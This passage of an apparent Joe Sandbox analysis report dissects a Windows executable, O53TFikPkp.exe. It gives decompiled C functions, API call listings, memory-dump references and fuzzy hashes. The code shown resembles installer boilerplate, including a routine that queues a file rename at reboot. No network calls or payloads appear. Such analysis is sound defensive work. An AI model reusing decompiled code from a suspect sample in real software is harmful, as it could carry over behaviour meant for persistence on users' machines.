                                                                                            0x004041ec
                                                                                            0x004041ee
                                                                                            0x004041ee
                                                                                            0x004041f4
                                                                                            0x004041f4
                                                                                            0x004041f7
                                                                                            0x00000000
                                                                                            0x004041fe
                                                                                            0x00404123
                                                                                            0x00404125
                                                                                            0x0040412f
                                                                                            0x0040413a
                                                                                            0x0040413d
                                                                                            0x00404140
                                                                                            0x0040414b
                                                                                            0x0040414e
                                                                                            0x00404155
                                                                                            0x00404163
                                                                                            0x0040417b
                                                                                            0x00404183
                                                                                            0x0040418e
                                                                                            0x0040419e
                                                                                            0x004041a0
                                                                                            0x004041a0
                                                                                            0x00404155
                                                                                            0x004041aa
                                                                                            0x00000000
                                                                                            0x004041b5
                                                                                            0x004041b9
                                                                                            0x004041ca
                                                                                            0x004041ca
                                                                                            0x004041d0
                                                                                            0x004041de
                                                                                            0x004041de
                                                                                            0x00000000
                                                                                            0x004041e2
                                                                                            0x004041aa
                                                                                            0x004040c0
                                                                                            0x00000000
                                                                                            0x004040d4
                                                                                            0x004040d4
                                                                                            0x004040da
                                                                                            0x004040da
                                                                                            0x004040e0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404105
                                                                                            0x00404107
                                                                                            0x0040410c
                                                                                            0x00000000
                                                                                            0x0040410c
                                                                                            0x004040c0
                                                                                            0x00403f95
                                                                                            0x00403f98
                                                                                            0x00403f9d
                                                                                            0x00403fae
                                                                                            0x00403fae
                                                                                            0x00403fb5
                                                                                            0x00403fb8
                                                                                            0x00403fba
                                                                                            0x00403fbf
                                                                                            0x00403fc8
                                                                                            0x00403fce
                                                                                            0x00403fda
                                                                                            0x00403fdd
                                                                                            0x00403fe6
                                                                                            0x00403feb
                                                                                            0x00403fee
                                                                                            0x00403ff3
                                                                                            0x0040400a
                                                                                            0x00404011
                                                                                            0x00404024
                                                                                            0x00404027
                                                                                            0x0040403c
                                                                                            0x00404043
                                                                                            0x00404048
                                                                                            0x0040404d
                                                                                            0x0040404d
                                                                                            0x0040405c
                                                                                            0x0040406b
                                                                                            0x0040406d
                                                                                            0x00404083
                                                                                            0x00404092
                                                                                            0x00404094
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                                                                                            • GetDlgItem.USER32 ref: 0040401E
                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                                                                                            • GetSysColor.USER32(?), ref: 0040404D
                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                                                                                            • lstrlenA.KERNEL32(?), ref: 00404075
                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                                                                                            • GetDlgItem.USER32 ref: 004040F5
                                                                                            • SendMessageA.USER32(00000000), ref: 004040F8
                                                                                            • GetDlgItem.USER32 ref: 00404123
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                                                                                            • LoadCursorA.USER32 ref: 00404172
                                                                                            • SetCursor.USER32(00000000), ref: 0040417B
                                                                                            • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                                                                                            • LoadCursorA.USER32 ref: 0040419B
                                                                                            • SetCursor.USER32(00000000), ref: 0040419E
                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                            • String ID: @.B$N$open
                                                                                            • API String ID: 3615053054-3815657624
                                                                                            • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                                                                                            • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                                                                                            • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                                                                                            • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 90%
                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                            				struct tagLOGBRUSH _v16;
                                                                                            				struct tagRECT _v32;
                                                                                            				struct tagPAINTSTRUCT _v96;
                                                                                            				struct HDC__* _t70;
                                                                                            				struct HBRUSH__* _t87;
                                                                                            				struct HFONT__* _t94;
                                                                                            				long _t102;
                                                                                            				signed int _t126;
                                                                                            				struct HDC__* _t128;
                                                                                            				intOrPtr _t130;
                                                                                            
                                                                                            				if(_a8 == 0xf) {
                                                                                            					_t130 =  *0x423eb0;
                                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                            					_a8 = _t70;
                                                                                            					GetClientRect(_a4,  &_v32);
                                                                                            					_t126 = _v32.bottom;
                                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                            					while(_v32.top < _t126) {
                                                                                            						_a12 = _t126 - _v32.top;
                                                                                            						asm("cdq");
                                                                                            						asm("cdq");
                                                                                            						asm("cdq");
                                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                                            						_a16 = _t87;
                                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                                            						DeleteObject(_a16);
                                                                                            						_v32.top = _v32.top + 4;
                                                                                            					}
                                                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                            						_a16 = _t94;
                                                                                            						if(_t94 != 0) {
                                                                                            							_t128 = _a8;
                                                                                            							_v32.left = 0x10;
                                                                                            							_v32.top = 8;
                                                                                            							SetBkMode(_t128, 1);
                                                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                            							_a8 = SelectObject(_t128, _a16);
                                                                                            							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                                                                                            							SelectObject(_t128, _a8);
                                                                                            							DeleteObject(_a16);
                                                                                            						}
                                                                                            					}
                                                                                            					EndPaint(_a4,  &_v96);
                                                                                            					return 0;
                                                                                            				}
                                                                                            				_t102 = _a16;
                                                                                            				if(_a8 == 0x46) {
                                                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                                                                                            				}
                                                                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                            			}













                                                                                            0x0040100a
                                                                                            0x00401039
                                                                                            0x00401047
                                                                                            0x0040104d
                                                                                            0x00401051
                                                                                            0x0040105b
                                                                                            0x00401061
                                                                                            0x00401064
                                                                                            0x004010f3
                                                                                            0x00401089
                                                                                            0x0040108c
                                                                                            0x004010a6
                                                                                            0x004010bd
                                                                                            0x004010cc
                                                                                            0x004010cf
                                                                                            0x004010d5
                                                                                            0x004010d9
                                                                                            0x004010e4
                                                                                            0x004010ed
                                                                                            0x004010ef
                                                                                            0x004010ef
                                                                                            0x00401100
                                                                                            0x00401105
                                                                                            0x0040110d
                                                                                            0x00401110
                                                                                            0x00401112
                                                                                            0x00401118
                                                                                            0x0040111f
                                                                                            0x00401126
                                                                                            0x00401130
                                                                                            0x00401142
                                                                                            0x00401156
                                                                                            0x00401160
                                                                                            0x00401165
                                                                                            0x00401165
                                                                                            0x00401110
                                                                                            0x0040116e
                                                                                            0x00000000
                                                                                            0x00401178
                                                                                            0x00401010
                                                                                            0x00401013
                                                                                            0x00401015
                                                                                            0x0040101f
                                                                                            0x0040101f
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                            • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                            • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                            • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E004057D3() {
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr* _t15;
                                                                                            				long _t16;
                                                                                            				int _t20;
                                                                                            				void* _t28;
                                                                                            				long _t29;
                                                                                            				intOrPtr* _t37;
                                                                                            				int _t43;
                                                                                            				void* _t44;
                                                                                            				long _t47;
                                                                                            				CHAR* _t49;
                                                                                            				void* _t51;
                                                                                            				void* _t53;
                                                                                            				intOrPtr* _t54;
                                                                                            				void* _t55;
                                                                                            				void* _t56;
                                                                                            
                                                                                            				_t15 = E00405DA3(1);
                                                                                            				_t49 =  *(_t55 + 0x18);
                                                                                            				if(_t15 != 0) {
                                                                                            					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                            					if(_t20 != 0) {
                                                                                            						L16:
                                                                                            						 *0x423f30 =  *0x423f30 + 1;
                                                                                            						return _t20;
                                                                                            					}
                                                                                            				}
                                                                                            				 *0x422628 = 0x4c554e;
                                                                                            				if(_t49 == 0) {
                                                                                            					L5:
                                                                                            					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                                                                                            					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                            						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                                                                                            						_t56 = _t55 + 0x10;
                                                                                            						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                                                                                            						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                                                                                            						_t53 = _t20;
                                                                                            						 *(_t56 + 0x14) = _t53;
                                                                                            						if(_t53 == 0xffffffff) {
                                                                                            							goto L16;
                                                                                            						}
                                                                                            						_t47 = GetFileSize(_t53, 0);
                                                                                            						_t7 = _t43 + 0xa; // 0xa
                                                                                            						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                            						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                            							L15:
                                                                                            							_t20 = CloseHandle(_t53);
                                                                                            							goto L16;
                                                                                            						} else {
                                                                                            							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                                                                                            								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                                                                                            								if(_t28 == 0) {
                                                                                            									L13:
                                                                                            									_t29 = _t47;
                                                                                            									L14:
                                                                                            									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                                                                                            									SetFilePointer(_t53, 0, 0, 0);
                                                                                            									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                            									GlobalFree(_t51);
                                                                                            									goto L15;
                                                                                            								}
                                                                                            								_t37 = _t28 + 1;
                                                                                            								_t44 = _t51 + _t47;
                                                                                            								_t54 = _t37;
                                                                                            								if(_t37 >= _t44) {
                                                                                            									L21:
                                                                                            									_t53 =  *(_t56 + 0x14);
                                                                                            									_t29 = _t37 - _t51;
                                                                                            									goto L14;
                                                                                            								} else {
                                                                                            									goto L20;
                                                                                            								}
                                                                                            								do {
                                                                                            									L20:
                                                                                            									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                            									_t54 = _t54 + 1;
                                                                                            								} while (_t54 < _t44);
                                                                                            								goto L21;
                                                                                            							}
                                                                                            							E00405A85(_t51 + _t47, "[Rename]\r\n");
                                                                                            							_t47 = _t47 + 0xa;
                                                                                            							goto L13;
                                                                                            						}
                                                                                            					}
                                                                                            				} else {
                                                                                            					CloseHandle(E0040575C(_t49, 0, 1));
                                                                                            					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                                                                                            					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                            						goto L5;
                                                                                            					}
                                                                                            				}
                                                                                            				return _t16;
                                                                                            			}





















                                                                                            0x004057d9
                                                                                            0x004057e0
                                                                                            0x004057e4
                                                                                            0x004057ed
                                                                                            0x004057f1
                                                                                            0x00405930
                                                                                            0x00405930
                                                                                            0x00000000
                                                                                            0x00405930
                                                                                            0x004057f1
                                                                                            0x004057fd
                                                                                            0x00405813
                                                                                            0x0040583b
                                                                                            0x00405846
                                                                                            0x0040584a
                                                                                            0x0040586a
                                                                                            0x00405871
                                                                                            0x0040587b
                                                                                            0x00405888
                                                                                            0x0040588d
                                                                                            0x00405892
                                                                                            0x00405896
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004058a5
                                                                                            0x004058a7
                                                                                            0x004058b4
                                                                                            0x004058b8
                                                                                            0x00405929
                                                                                            0x0040592a
                                                                                            0x00000000
                                                                                            0x004058d4
                                                                                            0x004058e1
                                                                                            0x00405946
                                                                                            0x0040594d
                                                                                            0x004058f4
                                                                                            0x004058f4
                                                                                            0x004058f6
                                                                                            0x004058ff
                                                                                            0x0040590a
                                                                                            0x0040591c
                                                                                            0x00405923
                                                                                            0x00000000
                                                                                            0x00405923
                                                                                            0x0040594f
                                                                                            0x00405950
                                                                                            0x00405955
                                                                                            0x00405957
                                                                                            0x00405964
                                                                                            0x00405964
                                                                                            0x00405968
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405959
                                                                                            0x00405959
                                                                                            0x0040595c
                                                                                            0x0040595f
                                                                                            0x00405960
                                                                                            0x00000000
                                                                                            0x00405959
                                                                                            0x004058ec
                                                                                            0x004058f1
                                                                                            0x00000000
                                                                                            0x004058f1
                                                                                            0x004058b8
                                                                                            0x00405815
                                                                                            0x00405820
                                                                                            0x00405829
                                                                                            0x0040582d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040582d
                                                                                            0x0040593a

                                                                                            APIs
                                                                                              • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                                                                                              • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                                                                                              • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                                                                                            • GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
                                                                                            • GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
                                                                                            • wsprintfA.USER32 ref: 00405864
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                                                                                            • GlobalFree.KERNEL32 ref: 00405923
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                                                                                              • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                                                                                              • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                            • String ID: %s=%s$(&B$[Rename]
                                                                                            • API String ID: 3772915668-1834469719
                                                                                            • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                                                                                            • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                                                                                            • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                                                                                            • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00405CE3(CHAR* _a4) {
                                                                                            				char _t5;
                                                                                            				char _t7;
                                                                                            				char* _t15;
                                                                                            				char* _t16;
                                                                                            				CHAR* _t17;
                                                                                            
                                                                                            				_t17 = _a4;
                                                                                            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                            					_t17 =  &(_t17[4]);
                                                                                            				}
                                                                                            				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                                                                                            					_t17 =  &(_t17[2]);
                                                                                            				}
                                                                                            				_t5 =  *_t17;
                                                                                            				_t15 = _t17;
                                                                                            				_t16 = _t17;
                                                                                            				if(_t5 != 0) {
                                                                                            					do {
                                                                                            						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                                                                                            							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                            							_t16 = CharNextA(_t16);
                                                                                            						}
                                                                                            						_t17 = CharNextA(_t17);
                                                                                            						_t5 =  *_t17;
                                                                                            					} while (_t5 != 0);
                                                                                            				}
                                                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                                                            				while(1) {
                                                                                            					_t16 = CharPrevA(_t15, _t16);
                                                                                            					_t7 =  *_t16;
                                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                            						break;
                                                                                            					}
                                                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                                                            					if(_t15 < _t16) {
                                                                                            						continue;
                                                                                            					}
                                                                                            					break;
                                                                                            				}
                                                                                            				return _t7;
                                                                                            			}








                                                                                            0x00405ce5
                                                                                            0x00405ced
                                                                                            0x00405d01
                                                                                            0x00405d01
                                                                                            0x00405d07
                                                                                            0x00405d14
                                                                                            0x00405d14
                                                                                            0x00405d15
                                                                                            0x00405d17
                                                                                            0x00405d1b
                                                                                            0x00405d1d
                                                                                            0x00405d26
                                                                                            0x00405d28
                                                                                            0x00405d42
                                                                                            0x00405d4a
                                                                                            0x00405d4a
                                                                                            0x00405d4f
                                                                                            0x00405d51
                                                                                            0x00405d53
                                                                                            0x00405d57
                                                                                            0x00405d58
                                                                                            0x00405d5b
                                                                                            0x00405d63
                                                                                            0x00405d65
                                                                                            0x00405d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d6f
                                                                                            0x00405d74
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405d74
                                                                                            0x00405d79

                                                                                            APIs
                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                                                                            • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                                                                            • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\O53TFikPkp.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-4104018374
                                                                                            • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                                                                                            • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                                                                                            • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                                                                                            • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                            				struct tagLOGBRUSH _v16;
                                                                                            				long _t35;
                                                                                            				long _t37;
                                                                                            				void* _t40;
                                                                                            				long* _t49;
                                                                                            
                                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                                            					L15:
                                                                                            					return 0;
                                                                                            				}
                                                                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                            				if(_t49 == 0) {
                                                                                            					goto L15;
                                                                                            				}
                                                                                            				_t35 =  *_t49;
                                                                                            				if((_t49[5] & 0x00000002) != 0) {
                                                                                            					_t35 = GetSysColor(_t35);
                                                                                            				}
                                                                                            				if((_t49[5] & 0x00000001) != 0) {
                                                                                            					SetTextColor(_a8, _t35);
                                                                                            				}
                                                                                            				SetBkMode(_a8, _t49[4]);
                                                                                            				_t37 = _t49[1];
                                                                                            				_v16.lbColor = _t37;
                                                                                            				if((_t49[5] & 0x00000008) != 0) {
                                                                                            					_t37 = GetSysColor(_t37);
                                                                                            					_v16.lbColor = _t37;
                                                                                            				}
                                                                                            				if((_t49[5] & 0x00000004) != 0) {
                                                                                            					SetBkColor(_a8, _t37);
                                                                                            				}
                                                                                            				if((_t49[5] & 0x00000010) != 0) {
                                                                                            					_v16.lbStyle = _t49[2];
                                                                                            					_t40 = _t49[3];
                                                                                            					if(_t40 != 0) {
                                                                                            						DeleteObject(_t40);
                                                                                            					}
                                                                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                            				}
                                                                                            				return _t49[3];
                                                                                            			}








                                                                                            0x00403eb0
                                                                                            0x00403f44
                                                                                            0x00000000
                                                                                            0x00403f44
                                                                                            0x00403ec1
                                                                                            0x00403ec5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403ecb
                                                                                            0x00403ed4
                                                                                            0x00403ed7
                                                                                            0x00403ed7
                                                                                            0x00403edd
                                                                                            0x00403ee3
                                                                                            0x00403ee3
                                                                                            0x00403eef
                                                                                            0x00403ef5
                                                                                            0x00403efc
                                                                                            0x00403eff
                                                                                            0x00403f02
                                                                                            0x00403f04
                                                                                            0x00403f04
                                                                                            0x00403f0c
                                                                                            0x00403f12
                                                                                            0x00403f12
                                                                                            0x00403f1c
                                                                                            0x00403f21
                                                                                            0x00403f24
                                                                                            0x00403f29
                                                                                            0x00403f2c
                                                                                            0x00403f2c
                                                                                            0x00403f3c
                                                                                            0x00403f3c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
